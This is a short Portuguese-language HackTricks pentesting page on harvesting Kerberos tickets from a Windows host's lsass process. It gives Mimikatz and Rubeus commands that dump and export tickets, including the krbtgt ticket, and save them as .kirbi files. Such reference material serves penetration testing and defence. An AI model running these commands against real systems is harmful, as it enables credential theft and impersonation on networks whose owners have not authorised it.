hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
2023-06-06 18:56:34 +00:00

4.3 KiB
Raw Blame History

Coletando tickets do Windows

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

No Windows, os tickets são manipulados e armazenados pelo processo lsass (Local Security Authority Subsystem Service), que é responsável pela segurança. Portanto, para recuperar tickets de um sistema Windows, é necessário comunicar-se com o lsass e solicitá-los. Como um usuário não administrativo, apenas os tickets possuídos podem ser coletados, no entanto, como administrador da máquina, todos eles podem ser coletados. Para esse propósito, as ferramentas Mimikatz ou Rubeus podem ser usadas como mostrado abaixo:

# Using mimikatz
sekurlsa::tickets /export
# Using Rubeus
## Dump all tickets
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

## List all tickets
.\Rubeus.exe triage
## Dump the interesting one by luid
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

Esta informação foi retirada de: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥